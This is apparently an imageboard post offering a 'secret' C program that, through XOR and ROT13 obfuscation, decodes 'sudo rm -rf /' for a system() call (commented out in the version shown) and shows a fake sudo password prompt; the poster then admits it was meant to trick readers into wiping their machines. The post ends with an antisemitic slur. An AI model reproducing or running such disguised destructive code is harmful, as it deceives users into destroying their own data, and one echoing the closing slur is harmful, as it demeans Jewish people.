Secret

Can you figure out what this secret program does? It's so secret, even I don't know what it is. Nothing seems to happen when I run it.

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#include <time.h>

#define SUPERSECRET    "OAXQ)HI)$HZ)&"

static int secret(char* buffer, int count, int key1, int key2)
{
    int i, ret = 0;

    if ((((int)rand()) % 2) == 0) {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key1;
    } else {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key2;
    }
    for (i = 0; i < count; ++i) {
        int c = tolower(buffer[i]);
        if ((c < 'a') || (c > 'z'))
            continue;
        else if (c <= 'a' + 13)
            c += 13;
        else
            c -= 13;
        buffer[i] = c;
    }
    if ((((int)rand()) % 2) == 0) {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key2;
    } else {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key1;
    }
    for (i = 0; i < count; ++i) {
        buffer[i] = tolower(buffer[i]);
        ret += buffer[i];
    }
    return ret;
}

int main()
{
    char* buffer = calloc(strlen(SUPERSECRET) + 1, 1);
    int ret;
    srand((unsigned)time(NULL));
    while (ret != 1070) {
        strncpy(buffer, SUPERSECRET, strlen(SUPERSECRET));
        ret = secret(buffer, (int)strlen(buffer), 43, 34);
    }
    if ((ret & 31) == 31) {
        fprintf(stderr, "[sudo] password for %s", getenv("USER"));
        getpass(": ");
    }
//    system(buffer);
    free(buffer);
    return 0;
}

Ok, OP here, I was bored and wanted to see if I could trick anyone into executing "sudo rm -rf /" in a ridiculously roundabout way. I wasn't expecting anyone on /prog/ to be dumb enough to run it, before anyone asks. I also posted it on /g/ but Firefox decided not to noko and I lost the thread (lol).

The "secret" function is a xor cypher which is then ROT13'd and then xor'd again with two different keys. I wrote a smaller version, put the text as "sudo rm -rf /", and then got the #define'd text. Then I reversed the keys so that it would be undone to transform the text back into "sudo rm -rf /". Then I added the calls to rand() as a red herring. Then, to confirm that the correct string was being generated, I summed the ASCII values of the characters in "sudo rm -rf /" (1070) and used that to make sure it was generating the right string (because of the rand() calls, there are 4 strings it can generate from the same input text). Then I added the pseudo-sudo thing at the end as another red herring, because when the command is executed it'll ask for the user's password. That was to make it look like it was the program pretending to be sudo, rather than the actual sudo command being executed.

And I would've gotten away with it too, if it weren't for you meddling jews.